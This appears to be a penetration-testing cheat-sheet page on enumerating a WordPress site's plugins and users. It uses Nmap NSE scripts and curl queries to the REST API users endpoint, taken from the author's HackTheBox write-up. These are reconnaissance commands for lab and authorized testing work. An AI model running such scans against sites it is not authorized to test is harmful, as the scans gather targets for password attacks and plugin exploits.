Skip to main content

Manual Enumeration with Nmap

Find WordPress NSE Scripts

find /usr/share/nmap/scripts -name '*wordpress*'

Enumerate WordPress Plugins

grep '@args' /usr/share/nmap/scripts/http-wordpress-enum.nse

Example scan with arguments, where the base URL for the WordPress installation is at http://domain.tld/webservices/wp/ and enumerating all plugins, as well as getting the latest plugin data from WordPress.

sudo nmap -T4 -Pn -sC --script http-wordpress-enum --script-args http-wordpress-enum.root="/webservices/wp/",http-wordpress-enum.search-limit="all",http-wordpress-enum.check-latest="true" -p80 domain.tld


Enumerate WordPress Users

Nmap

List possible Nmap script arguments

grep '@args' /usr/share/nmap/scripts/http-wordpress-users.nse

Example scan with arguments, where the base URL for the WordPress installation is at http://domain.tld/webservices/wp/ and enumerating 100 possible users.

sudo nmap -T4 -Pn -sC --script http-wordpress-users --script-args http-wordpress-users.basepath="/webservices/wp/",http-wordpress-users.limit="100" -p80 domain.tld

REST API

This script hasn't always worked for me. Another option is to use the REST API to enumerate users.

# Get the first 100 users from the API
# Results should be paginated when dealing with large quantities of results
curl -s http://domain.tld/wp-json/wp/v2/users?per_page=100&page=1

# Get the next 100 users from the API
# Query page 2 of the results
curl -s http://domain.tld/wp-json/wp/v2/users?per_page=100&page=2

References

Borrowed from my write-up of HackTheBox's Taratarsauce: https://benheater.com/hackthebox-tartarsauce/#wordpress-enumeration

Back to top